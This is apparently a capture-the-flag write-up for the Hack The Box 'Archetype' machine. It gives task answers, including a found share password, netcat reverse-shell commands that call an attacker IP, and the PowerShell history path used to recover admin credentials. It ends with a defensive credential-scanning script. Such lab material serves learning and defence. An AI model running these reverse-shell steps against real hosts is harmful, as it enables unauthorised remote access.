Due date: Sep 18, 2023 04:16 AM
Task 1: Which TCP port is hosting a database server?
1433

Task 2: What is the name of the non-Administrative share available over SMB?

Task 3: What is the password identified in the file on the SMB share?
M3g4c0rp123


Task 4: What script from the Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
Task 5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
Task 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
winpeas
First create a reverse shell and upload nc.exe (commands recovered from the screenshot captions):

- `python3 -m http.server [port]`
- `nc.exe -e powershell.exe [attacker ip] [attacker listening port]`
- `nc -lvnp [attacker listening port]`
Install winPEAS on the victim.

Task 7: What file contains the administrator's password?
After running winPEAS, check the PowerShell history first:
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
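As an added defender-side example (not part of the original writeup), a small Python scanner that flags plaintext credentials left in a PSReadLine ConsoleHost_history.txt like the one found above; the sample history content and the command patterns are constructed for illustration.

```python
import re
from typing import List, Dict

# Constructed sample of a PSReadLine ConsoleHost_history.txt (not from the box);
# the real file lives under %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\.
SAMPLE_HISTORY = """\
Get-ChildItem C:\\backups
net.exe use T: \\\\fileserver\\backups /user:CORP\\svc_backup ExamplePass123!
$sec = ConvertTo-SecureString 'Winter2023!' -AsPlainText -Force
Invoke-Sqlcmd -ServerInstance localhost -Username sa -Password 'SaPassw0rd'
Get-Service | Where-Object Status -eq Running
exit
"""

# Each pattern captures the secret in a group named 'secret' so it can be redacted.
CREDENTIAL_PATTERNS = [
    # net use ... /user:DOMAIN\name <password>
    re.compile(r"/user:\S+\s+(?P<secret>\S+)", re.IGNORECASE),
    # ConvertTo-SecureString '<password>' ... -AsPlainText
    re.compile(r"ConvertTo-SecureString\s+['\"]?(?P<secret>[^'\"\s]+)['\"]?.*-AsPlainText", re.IGNORECASE),
    # -Password <value> (Invoke-Sqlcmd and similar; may also hit -PasswordFile, review manually)
    re.compile(r"-Password\s+['\"]?(?P<secret>[^'\"\s]+)", re.IGNORECASE),
]


def redact(value: str) -> str:
    """Keep only the first two characters so the finding is identifiable but not reusable."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "*" * len(value)


def scan_history(text: str) -> List[Dict[str, object]]:
    """Return one finding per history line that appears to carry a plaintext credential."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for pattern in CREDENTIAL_PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append({
                    "line": lineno,
                    "token": line.split()[0],          # first token of the offending command
                    "secret": redact(m.group("secret")),
                })
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['token']} leaks {f['secret']}")
```

Running the same scan over every user's PSReadLine history during a host review (or clearing the file after privileged sessions) removes exactly the foothold this task relies on.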


Log in as administrator.

Submit user flag


Submit root flag


Reference
- Author: ji3g4gp
- Link: https://gpblog.vercel.app//article/HTB-Archetype
- Copyright: This article is licensed under CC BY-NC-SA 4.0; please credit the source when reposting.